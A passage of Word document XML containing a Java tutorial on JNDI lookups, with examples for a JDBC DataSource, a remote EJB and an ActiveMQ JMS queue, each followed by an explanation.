    <w:p w14:paraId="66AABE06" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45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use the lookup() method of the Context object to fetch the resource by its JNDI name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F48E530" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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Use the Resource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D49B0" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45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ce the lookup is successful, you can cast the object to the correct type and use it as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4950CA51" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F35A2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B5808CC">
          <v:rect id="_x0000_i1208" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E560D" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2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Code to Access JNDI in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E7F549" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2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1: Accessing a DataSource (Database Connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B9ACB6"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x.naming.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5923AEFD"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x.sql.DataSource;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FCF6D4"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sql.Connection;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B95F178"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sql.SQLException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325D42E4" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDBE471"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JNDIExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D7A50F"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2FE3FA68"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580A25F8"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et up environment properties for JNDI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185F9228"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Hashtable&lt;String, String&gt; env = new Hashtable&lt;String, String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2576D410"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nv.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.fscontext.RefFSContextFactory");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB220E2"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nv.put(Context.PROVIDER_URL, "file:///C:/JNDI"); // Sample provider URL (file system-based JNDI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA46B58" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B708BB"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e the InitialContext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD6A7DA"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ntext ctx = new InitialContext(env);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F23FB2" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55825FE9"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Lookup the DataSource object using JNDI name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A65C18"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ataSource ds = (DataSource) ctx.lookup("jdbc/myDataSource");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A27AE27" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F50F92A"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Get a connection from the DataSource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2073A8C9"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nnection connection = ds.getConnection();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101EE969" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CED1213"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onnected to the database successfully!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDB2DD4"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se the connection as needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7A106E" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D533E3"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tch (NamingException | SQLException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3462D4"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printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C05747"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4E106CD"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7CEAF4D"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F280C16" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E64B682" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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tting up the Environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BA5F49" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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environment Hashtable is configured with two properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E646FD" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4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ITIAL_CONTEXT_FACTORY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This specifies the JNDI context factory to be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3E3F15" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4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OVIDER_URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the JNDI provider URL. In this case, a file-based provider is being used (file:///C:/JNDI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58070D67" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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reating the InitialContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2199FD2A" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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text ctx = new InitialContext(env) creates an InitialContext object using the environment properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B91F872" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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okup the DataSource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F4EC22" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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ataSource ds = (DataSource) ctx.lookup("jdbc/myDataSource") performs the JNDI lookup using the JNDI name ("jdbc/myDataSource"). This name should match the JNDI configuration in your container (such as Tomcat, Glassfish, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64138919" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Get Connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7F7F7D" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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ce the DataSource is fetched, you can call ds.getConnection() to obtain a database connection from the connection pool managed by the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224ABE78" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F35A2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B563AD8">
          <v:rect id="_x0000_i1209" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879D631" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2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2: Accessing an EJB (Enterprise Java Bean)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651ACC0C"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x.naming.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012D5AE"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x.ejb.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9C4E92" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707F397D"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public class EJBJNDIExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD5364"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6F04FB37"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D266FA8"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et up the environment properties for JNDI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3696517B"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Hashtable&lt;String, String&gt; env = new Hashtable&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC0A02B"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nv.put(Context.INITIAL_CONTEXT_FACTORY, "org.jboss.naming.client.InitialContextFactory");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD6C35"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nv.put(Context.PROVIDER_URL, "http-remoting://localhost:8080");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BD1E3E" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3E2D6D"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e the InitialContext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5861A702"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ntext ctx = new InitialContext(env);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3550CD98" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77EC2033"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Lookup the EJB using its JNDI name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389C3884"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EJBRemote myEJB = (MyEJBRemote) ctx.lookup("java:global/MyApp/MyEJB!com.example.MyEJBRemote");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3100AF" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF42685"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se the EJB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57769A33"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EJB.someMethod();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C068737" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217E5061"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EJB method invoked successfully!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DE5569" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7F4B27"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tch (NamingException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5772DEE0"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printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDD0AB1"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6F027E7"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637AFA4"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15A27FB" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABC9656" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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tting up JNDI Environment for EJB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE02606" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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JNDI environment is configured for a remote EJB lookup (using http-remoting://localhost:8080 as the provider URL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551FAAA4" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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reating the InitialContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE23629" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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InitialContext object is created using the environment properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1344A1E8" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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okup the EJB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B04010B" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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use ctx.lookup("java:global/MyApp/MyEJB!com.example.MyEJBRemote") to look up the remote EJB. The JNDI name follows the pattern "java:global/&lt;application_name&gt;/&lt;module_name&gt;/&lt;bean_name&gt;!".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A8F2F0" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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the EJB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337CC944" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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fter looking up the EJB, you can invoke methods on it as you would with any regular Java object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5541F4B8" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F35A2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61C6E45">
          <v:rect id="_x0000_i1210" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E560777" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2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3: Accessing a JMS Queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25694B28"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x.jms.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5374F8B9"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x.naming.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4976BE14" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B66DC2E"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JMSJNDIExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419C586"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4BBB8669"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74205716"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et up environment properties for JNDI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B9EB3E"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Hashtable&lt;String, String&gt; env = new Hashtable&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528273ED"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nv.put(Context.INITIAL_CONTEXT_FACTORY, "org.apache.activemq.jndi.ActiveMQInitialContextFactory");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A63318"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nv.put(Context.PROVIDER_URL, "tcp://localhost:61616");  // ActiveMQ broker URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003246C" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6398EAB8"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e the InitialContext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C718A7A"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ntext ctx = new InitialContext(env);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA7145" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19381CCA"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Lookup the JMS Queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B5381E"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Queue queue = (Queue) ctx.lookup("dynamicQueues/myQueue");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B369C5B" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79193781"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 Set up JMS connection, session, and message producer/consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57735828"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JMS connection and session setup omitted for brevity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F09DFF4" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E18349"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JMS Queue lookup successful!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7653DF" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7C6F5F"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tch (NamingException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC975CA"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printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B89DE6"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08E6064"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1149C04"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EB22E6D" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ABF7CC" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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environment is set for ActiveMQ JMS. The queue is looked up using the JNDI name "dynamicQueues/myQueue".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744E0BAC" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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fter the lookup, you can use JMS APIs (e.g., QueueSession, QueueConnection) to send/receive messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122B905" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F35A2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BBF4C5E">
          <v:rect id="_x0000_i1211" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C20F89D" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2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 of Steps to Access JNDI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE8C5A" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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reate an environment (Hashtable) with relevant properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (context factory, provider URL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158B596D" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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itialize a Context object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using InitialContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF26079" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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erform a lookup</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
